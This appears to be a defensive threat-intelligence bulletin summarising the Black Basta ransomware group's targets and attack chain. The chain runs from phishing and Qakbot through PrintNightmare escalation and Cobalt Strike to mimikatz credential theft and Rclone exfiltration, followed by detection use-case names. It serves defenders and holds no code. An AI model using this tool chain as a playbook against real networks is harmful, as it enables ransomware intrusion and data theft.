Trend Mico Takes a Deep Dive into Black Basta Ransomware

Industries: Apparel & Fashion, Construction, Entertainment, Finance, Insurance, Manufacturing, Materials, Professional Services, Retail, Technology, Transportation and Utilities | Level: Tactical | Source: Trend Micro

Arriving as early as April 2022, Black Basta ransomware-as-a-service (RaaS) has already been a menace in the threat landscape. Based on the victims the group has attacked, Black Basta aims for a targeted approach as opposed to spray-and-pray tactics. Trend Micro researchers have provided an in-depth spotlight article detailing known tactics, techniques, and procedures (TTPs) from the group. Geographically, the United States, Germany, Canada, France, and Austria have stood out as most the prominent attack targets. Targets have involved a variety of industries such as apparel & fashion, construction, entertainment, finance, insurance, manufacturing, materials, professional services, retail, technology, transportation, and utilities. Based on available attack telemetry, Black Basta was most active in June 2022, with 22 attacks. The group has been known to use spear phishing for its initial attack, to deploy Qakbot/Qbot malware or engage in underground forums to obtain corporate access credentials. Various PowerShell scripts are used in their attacks to initiate system reconnaissance, disable security products, and aid in lateral movement objectives. BITSAdmin, PsExec, Windows Management Instrumentation (WMI), and RDP are also tools used for lateral movement. To escalate privileges, Black Basta operators have been observed to exploit PrintNightmare CVE-2021-1675 to deliver Cobalt Strike beacons. Additional techniques include mimikatz used for credential access, rebooting the host into safe mode to circumvent controls, and Rclone for data exfiltration.

Anvilogic Scenario:

• Black Basta: Discovery, Lateral Movement, Priv Esc and Rclone

Anvilogic Use Cases:

• Modify Group Policy
• Remote Admin Tools
• Rclone Execution

‍